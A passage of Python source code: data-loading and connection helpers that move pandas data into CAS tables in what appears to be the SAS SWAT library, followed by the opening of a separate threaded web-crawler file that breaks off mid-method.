for response, conn in getnext(self, timeout=0):
if conn is not None:
yield response
#
# Top-level Pandas functions
#
def _get_table_args(self, **kwargs):
''' Extract table paramaters from function arguments '''
out = {}
kwargs = kwargs.copy()
casout = kwargs.pop('casout', {})
if isinstance(casout, CASTable):
casout = casout.to_outtable_params()
elif not isinstance(casout, dict):
casout = dict(name=casout)
out['table'] = casout.get('name', None)
out['caslib'] = casout.get('caslib', None)
out['replace'] = casout.get('replace', None)
out['label'] = casout.get('label', None)
out['promote'] = casout.get('promote', None)
if not out['table']:
out.pop('table')
if not out['caslib']:
out.pop('caslib')
if out['replace'] is None:
out.pop('replace')
if out['label'] is None:
out.pop('label')
if out['promote'] is None:
out.pop('promote')
return out, kwargs
def load_path(self, path=None, readahead=None, importoptions=None,
promote=None, ondemand=None, attrtable=None,
caslib=None, datasourceoptions=None, casout=None, singlepass=None,
where=None, vars=None, groupby=None, groupbyfmts=None,
groupbymode=None, orderby=None, nosource=None, returnwhereinfo=None,
**kwargs):
'''
Load a path from a CASLib
The parameters for this are the same as for the ``builtins.loadtable``
CAS action. This method is simply a convenience method that loads a
table and returns a :class:`CASTable` in one step.
Notes
-----
The path specified must exist on the **server side**. For loading
data from the client side, see the ``read_*`` and :meth:`upload` methods.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.load_path('data/iris.csv')
>>> print(tbl.head())
See Also
--------
:meth:`read_csv`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
args = {k: v for k, v in dict(path=path, readahead=readahead,
importoptions=importoptions, promote=promote,
ondemand=ondemand, attrtable=attrtable, caslib=caslib,
datasourceoptions=datasourceoptions, casout=casout,
singlepass=singlepass, where=where, vars=vars, groupby=groupby,
groupbyfmts=groupbyfmts, groupbymode=groupbymode,
orderby=orderby, nosource=nosource,
returnwhereinfo=returnwhereinfo).items() if v is not None}
args.update(kwargs)
out = self.retrieve('table.loadtable', _messagelevel='error', **args)
try:
return out['casTable']
except KeyError:
raise SWATError(out.status)
def _importoptions_from_dframe(self, dframe):
'''
Derive importoptions= values from DataFrame
'''
use_options = False
ivars = []
importoptions = dict(filetype='csv', vars=ivars)
for i, dtype in enumerate(dframe.dtypes.values):
dtype = str(dtype)
if 'int64' in dtype:
ivars.append(dict(type='int64'))
use_options = True
elif 'int32' in dtype:
ivars.append(dict(type='int32'))
use_options = True
else:
ivars.append({})
if use_options:
return importoptions
def _read_any(self, _method_, *args, **kwargs):
'''
Generic data file reader
Parameters
----------
_method_ : string
The name of the pandas data reader function.
*args : one or more arguments
Arguments to pass to the data reader.
**kwargs : keyword arguments
Keyword arguments to pass to the data reader function.
The keyword parameters 'table', 'caslib', 'promote', and
'replace' will be stripped to use for the output CAS
table parameters.
Returns
-------
:class:`CASTable`
'''
import pandas as pd
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(**kwargs)
dframe = getattr(pd, _method_)(*args, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.PandasDataFrame(dframe).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_pickle(self, path, casout=None, **kwargs):
'''
Load pickled pandas object from the specified path
This method calls :func:`pandas.read_pickle` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path : string
Path to a local pickle file.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_pickle`.
Notes
-----
Paths to specified files point to files on the **client machine**.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_pickle('dataframe.pkl')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_pickle`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_pickle', path, casout=casout, **kwargs)
def read_table(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read general delimited file into a CAS table
This method calls :func:`pandas.read_table` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_table('iris.tsv')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_table(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.Text(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_csv(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read CSV file into a CAS table
This method calls :func:`pandas.read_csv` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_csv`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_csv('iris.csv')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_csv(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.CSV(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_frame(self, dframe, casout=None, **kwargs):
'''
Convert DataFrame to CAS table
Parameters
----------
dframe : DataFrame
The DataFrame to read into CAS
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
Notes
-----
When `use_addtable=False` (the default) is specified, this method
is equivalent to `upload_frame`. If `use_addtable=True` is specified,
the `table.addtable` CAS action is used and the DataFrame does not
need to be written to disk first. However, this mode can only be used
with the binary (not REST) protocol.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_frame(pd.DataFrame(np.random.randn(100, 4),
... columns='ABCD'))
>>> print(tbl.head())
See Also
--------
:meth:`upload_frame`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.PandasDataFrame(dframe, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_fwf(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read a table of fixed-width formatted lines into a CAS table
This method calls :func:`pandas.read_fwf` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_table('iris.dat')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_fwf(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.FWF(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_clipboard(self, casout=None, **kwargs):
'''
Read text from clipboard and pass to :meth:`read_table`
Parameters
----------
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
See Also
--------
:func:`pandas.read_clipboard`
:func:`pandas.read_table`
:meth:`read_table`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_clipboard', casout=casout, **kwargs)
def read_excel(self, io, casout=None, **kwargs):
'''
Read an Excel table into a CAS table
This method calls :func:`pandas.read_excel` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
io : string or path object
File-like object, URL, or pandas ExcelFile.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_excel('iris.xlsx')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_excel`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_excel', io, casout=casout, **kwargs)
def read_json(self, path_or_buf=None, casout=None, **kwargs):
'''
Read a JSON string into a CAS table
This method calls :func:`pandas.read_json` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path_or_buf : string or file-like object
The path, URL, or file object that contains the JSON data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_json('iris.json')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_json`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_json', path_or_buf, casout=casout, **kwargs)
def json_normalize(self, data, casout=None, **kwargs):
'''
"Normalize" semi-structured JSON data into a flat table and upload to a CAS table
This method calls :func:`pandas.json_normalize` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
data : dict or list of dicts
Unserialized JSON objects
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.json_normalize`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.json_normalize('iris.json')
>>> print(tbl.head())
See Also
--------
:func:`pandas.json_normalize`
Returns
-------
:class:`CASTable`
'''
return self._read_any('json_normalize', data, casout=casout, **kwargs)
def read_html(self, io, casout=None, **kwargs):
'''
Read HTML tables into a list of CASTable objects
This method calls :func:`pandas.read_html` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
io : string or file-like object
The path, URL, or file object that contains the HTML data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_html`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_html('iris.html')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_html`
Returns
-------
:class:`CASTable`
'''
import pandas as pd
from swat import datamsghandlers as dmh
use_addtable = kwargs.pop('use_addtable', False)
out = []
table, kwargs = self._get_table_args(casout=casout, **kwargs)
for i, dframe in enumerate(pd.read_html(io, **kwargs)):
if i and table.get('table'):
table['table'] += str(i)
if not use_addtable or self._protocol.startswith('http'):
out.append(self.upload_frame(dframe, casout=table and table or None))
# importoptions=self._importoptions_from_dframe(dframe)
else:
table.update(dmh.PandasDataFrame(dframe).args.addtable)
out.append(self.retrieve('table.addtable', **table).casTable)
return out
def read_hdf(self, path_or_buf, casout=None, **kwargs):
'''
Read from the HDF store and create a CAS table
This method calls :func:`pandas.read_hdf` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path_or_buf : string or file-like object
The path, URL, or file object that contains the HDF data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_hdf`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_hdf('iris.html')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_hdf`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_hdf', path_or_buf, casout=casout, **kwargs)
def read_sas(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read SAS files stored as XPORT or SAS7BDAT into a CAS table
This method calls :func:`pandas.read_sas` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : string or file-like object
The path, URL, or file object that contains the HDF data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sas`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sas('iris.sas7bdat')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_sas`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sas', filepath_or_buffer, casout=casout, **kwargs)
def read_sql_table(self, table_name, con, casout=None, **kwargs):
'''
Read SQL database table into a CAS table
This method calls :func:`pandas.read_sql_table` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
table_name : string
Name of SQL table in database.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql_table`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql_table('iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connecter from CAS.
See Also
--------
:func:`pandas.read_sql_table`
:meth:`read_sql_query`
:meth:`read_sql`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql_table', table_name, con, casout=casout, **kwargs)
def read_sql_query(self, sql, con, casout=None, **kwargs):
'''
Read SQL query table into a CAS table
This method calls :func:`pandas.read_sql_query` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
sql : string
SQL to be executed.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql_query`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql_query('select * from iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connecter from CAS.
See Also
--------
:func:`pandas.read_sql_query`
:meth:`read_sql_table`
:meth:`read_sql`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql_query', sql, con, casout=casout, **kwargs)
def read_sql(self, sql, con, casout=None, **kwargs):
'''
Read SQL query or database table into a CAS table
This method calls :func:`pandas.read_sql` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
sql : string
SQL to be executed or table name.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql('select * from iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connecter from CAS.
See Also
--------
:func:`pandas.read_sql`
:meth:`read_sql_table`
:meth:`read_sql_query`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql', sql, con, casout=casout, **kwargs)
def read_gbq(self, query, casout=None, **kwargs):
'''
Load data from a Google BigQuery into a CAS table
This method calls :func:`pandas.read_gbq` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
query : string
SQL-like query to return data values.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_gbq`.
See Also
--------
:func:`pandas.read_gbq`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_gbq', query, casout=casout, **kwargs)
def read_stata(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read Stata file into a CAS table
This method calls :func:`pandas.read_stata` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : string or file-like object
Path to .dta file or file-like object containing data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_stata`.
See Also
--------
:func:`pandas.read_stata`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_stata', filepath_or_buffer, casout=casout, **kwargs)
def path_to_caslib(self, path, name=None, **kwargs):
'''
Return a caslib name for a given path
If a caslib does not exist for the current path or for a parent
path, a new caslib will be created.
Parameters
----------
path : string
The absolute path to the desired caslib directory
name : string, optional
The name to give to the caslib, if a new one is created
kwargs : keyword-parameter, optional
Additional parameters to use when creating a new caslib
Returns
-------
( caslib-name, relative-path )
The return value is a two-element tuple. The first element
is the name of the caslib. The second element is the relative
path to the requested directory from the caslib. The second
element will be blank if the given path matches a caslib,
or a new caslib is created.
'''
if not name:
name = 'Caslib_%x' % random.randint(0, 1e9)
activeonadd_key = None
subdirectories_key = None
datasource_key = None
for key, value in kwargs.items():
if key.lower() == 'activeonadd':
activeonadd_key = key
elif key.lower() == 'subdirectories':
subdirectories_key = key
elif key.lower() == 'datasource':
datasource_key = key
if not activeonadd_key:
activeonadd_key = 'activeonadd'
kwargs[activeonadd_key] = False
if not subdirectories_key:
subdirectories_key = 'subdirectories'
kwargs[subdirectories_key] = True
if not datasource_key:
datasource_key = 'datasource'
kwargs[datasource_key] = dict(srctype='path')
is_windows = self.server_type.startswith('win')
if is_windows:
sep = '\\'
normpath = path.lower()
else:
sep = '/'
normpath = path
if normpath.endswith(sep):
normpath = normpath[:-1]
info = self.retrieve('table.caslibinfo',
_messagelevel='error')['CASLibInfo']
for libname, item, subdirs in zip(info['Name'], info['Path'],
info['Subdirs']):
if item.endswith(sep):
item = item[:-1]
if is_windows:
item = item.lower()
if item == normpath:
if bool(subdirs) != bool(kwargs[subdirectories_key]):
raise SWATError('caslib exists, but subdirectories flag differs')
return libname, ''
elif normpath.startswith(item):
if bool(subdirs) != bool(kwargs[subdirectories_key]):
raise SWATError('caslib exists, but subdirectories flag differs')
return libname, path[len(item) + 1:]
out = self.retrieve('table.addcaslib', _messagelevel='error',
name=name, path=path, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return name, ''
def getone(connection, datamsghandler=None):
'''
Get a single response from a connection
Parameters
----------
connection : :class:`CAS` object
The connection/CASAction to get the response from.
datamsghandler : :class:`CASDataMsgHandler` object, optional
The object to use for data messages from the server.
Examples
--------
>>> conn = swat.CAS()
>>> conn.invoke('serverstatus')
>>> print(getone(conn))
See Also
--------
:meth:`CAS.invoke`
Returns
-------
:class:`CASResponse` object
'''
output = None, connection
# enable data messages as needed
if datamsghandler is not None:
errorcheck(connection._sw_connection.enableDataMessages(),
connection._sw_connection)
_sw_message = errorcheck(connection._sw_connection.receive(),
connection._sw_connection)
if _sw_message:
mtype = _sw_message.getType()
if mtype == 'response':
_sw_response = errorcheck(_sw_message.toResponse(
connection._sw_connection), _sw_message)
if _sw_response is not None:
output = CASResponse(_sw_response, connection=connection), connection
elif mtype == 'request' and datamsghandler is not None:
_sw_request = errorcheck(_sw_message.toRequest(
connection._sw_connection), _sw_message)
if _sw_request is not None:
req = CASRequest(_sw_request)
output = datamsghandler(req, connection)
elif mtype == 'request':
_sw_request = errorcheck(_sw_message.toRequest(
connection._sw_connection), _sw_message)
if _sw_request is not None:
req = CASRequest(_sw_request)
output = req, connection
if datamsghandler is not None:
errorcheck(connection._sw_connection.disableDataMessages(),
connection._sw_connection)
# Raise exception as needed
if isinstance(output[0], CASResponse):
exception_on_severity = get_option('cas.exception_on_severity')
if exception_on_severity is not None and \
output[0].disposition.severity >= exception_on_severity:
raise SWATCASActionError(output[0].disposition.status, output[0], output[1])
return output
def getnext(*objs, **kwargs):
'''
Return responses as they appear from multiple connections
Parameters
----------
*objs : :class:`CAS` objects and/or :class:`CASAction` objects
Connection/CASAction objects to watch for responses.
timeout : int, optional
Timeout for waiting for a response on each connection.
datamsghandler : :class:`CASDataMsgHandler` object, optional
The object to use for data messages from the server.
Examples
--------
>>> conn1 = swat.CAS()
>>> conn2 = swat.CAS()
>>> conn1.invoke('serverstatus')
>>> conn2.invoke('userinfo')
>>> for resp in getnext(conn1, conn2):
... for k, v in resp:
... print(k, v)
See Also
--------
:meth:`CAS.invoke`
Returns
-------
:class:`CASResponse` object
'''
timeout = kwargs.get('timeout', 0)
datamsghandler = kwargs.get('datamsghandler')
if len(objs) == 1 and isinstance(objs[0], (list, tuple, set)):
connections = list(objs[0])
else:
connections = list(objs)
# if the item in a CASAction, use the connection
for i, conn in enumerate(connections):
if isinstance(conn, CASAction):
conn.invoke()
connections[i] = conn.get_connection()
# TODO: Set timeouts; check for mixed connection types
if isinstance(connections[0]._sw_connection, rest.REST_CASConnection):
for item in connections:
yield getone(item)
return
_sw_watcher = errorcheck(clib.SW_CASConnectionEventWatcher(len(connections), timeout,
a2n(connections[
0]._soptions),
connections[0]._sw_error),
connections[0]._sw_error)
for item in connections:
errorcheck(_sw_watcher.addConnection(item._sw_connection), _sw_watcher)
try:
while True:
i = errorcheck(_sw_watcher.wait(), _sw_watcher)
# finished
if i == -2:
break
# timeout / retry
if i == -1:
yield [], None
yield getone(connections[i], datamsghandler=datamsghandler)
except (KeyboardInterrupt, SystemExit):
for conn in connections:
errorcheck(conn._sw_connection.stopAction(), conn._sw_connection)
raise
def dir_actions(obj):
''' Return list of CAS actionsets / actions associated with the object '''
if hasattr(obj, '__dir_actions__'):
return obj.__dir_actions__()
return []
def dir_members(obj):
''' Return list of members not including associated CAS actionsets / actions '''
if hasattr(obj, '__dir_members__'):
return obj.__dir_members__()
return dir(obj)
|
crawler.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 6 12:49:02 2016
@author: daniel
"""
import logging
import threading # For main processing thread
import urllib # For downloading websites
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor # each downloads a website
from http.client import RemoteDisconnected
from queue import Queue, Empty # For processing downloaded websites
from socket import timeout as socket_timeout
from pyoogle.config import LOGGING_LEVEL
from pyoogle.preprocessing.crawl.linkconstraint import LinkConstraint # constraint to which links are allowed
from pyoogle.preprocessing.web.net import WebNet
from pyoogle.preprocessing.web.node import WebNode
from pyoogle.preprocessing.web.nodestore import WebNodeStore # for permanently saving created WebNodes
from pyoogle.preprocessing.web.parser import WebParser # parses the downloaded html site and extracts info
logging.getLogger().setLevel(LOGGING_LEVEL)
NotResolvable = "NOT_RESOLVABLE_LINK"
class Crawler:
# Initializes the Crawler. If max_sites is greater than zero it will only
# download this many sites and stop afterwards, else until no new site is found.
def __init__(self, store_path, link_constraint, max_sites=0, max_workers=2, timeout=30):
self.store_path = store_path
self.pending_links = Queue()
self.pending_websites = Queue()
self.web_net = None
self.link_constraint = link_constraint
if self.link_constraint is None:
raise ValueError("No link constraint given!")
self.already_processed_links = set()
self.already_processed_websites = set()
self.is_crawling = False
self.max_sites = max_sites
self.processed_sites_count = 0
self.max_workers = max_workers
self.timeout = timeout
self.starting_processor = None
self.links_processor = None
self.websites_processor = None
def _is_finished(self):
return not self.is_crawling or self.has_maximum_sites_processed()
def has_maximum_sites_processed(self):
return 0 < self.max_sites <= self.processed_sites_count
def process_link(self, link):
if self._is_finished():
return
website = Crawler.download_website(link, self.timeout)
if website is None:
logging.debug("Website %s not downloaded", link)
if website is NotResolvable:
logging.debug("Website %s not resolvable and not trying again.", link)
return
return self, link, website
@staticmethod
def link_got_processed(future):
if future.done() and future.result() is not None:
self, link, website = future.result()
if self._is_finished():
return
if website is None:
# revert and try later
logging.debug("Website %s not downloaded, retrying later ", link)
self.add_link(link)
return
if not self.has_maximum_sites_processed():
self.pending_websites.put((link, website))
def obtain_new_link(self):
link = None
while link is None and not self._is_finished():
try:
link = self.pending_links.get(timeout=self.timeout)
except Empty:
logging.info("No more links found to process!")
return
if link in self.already_processed_links:
link = None
continue # already processed
if link is not None:
self.already_processed_links.add(link)
return link
def process_links(self):
logging.info("Starting to process links")
try:
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
while not self._is_finished():
# this will submit many many futures when testing with limited maxsites(>0)
# but they will be ignored!
link = self.obtain_new_link()
if link is None:
return
future = executor.submit(self.process_link, link)
future.add_done_callback(Crawler.link_got_processed)
finally:
